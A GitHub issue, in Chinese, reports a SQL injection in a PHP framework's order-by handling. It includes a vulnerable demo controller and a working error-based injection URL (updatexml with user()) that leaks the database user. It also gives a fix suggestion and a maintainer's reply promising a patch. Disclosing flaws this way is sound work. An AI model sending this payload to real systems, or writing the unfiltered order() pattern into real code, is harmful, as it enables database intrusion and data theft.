Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
漏洞demo代码:
<?php namespace app\index\controller; class Test { public function index() { $data=array(); $data['username']=array('eq','admin'); $order=input('get.order');//使用input函数进行安全过滤 $m=db('user')->where($data)->order($order)->find(); dump($m); } }
漏洞原因是处理order by参数时,如果参数用户可控,当参数为数组key value时,未正确过滤处理数组的key值,导致漏洞的产生。
访问如下链接即可触发SQL注入漏洞:
http://127.0.0.1/tp5/public/index/index/test/index?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1
可以看到我们成功获取到数据库中的当前用户名。
修复建议 对order by语句处理流程加上数组分支安全校验。
The text was updated successfully, but these errors were encountered:
已经改进,下一个版本更新
Sorry, something went wrong.
No branches or pull requests
漏洞利用
漏洞demo代码:
漏洞原因是处理order by参数时,如果参数用户可控,当参数为数组key value时,未正确过滤处理数组的key值,导致漏洞的产生。
访问如下链接即可触发SQL注入漏洞:
可以看到我们成功获取到数据库中的当前用户名。
修复建议
对order by语句处理流程加上数组分支安全校验。
The text was updated successfully, but these errors were encountered: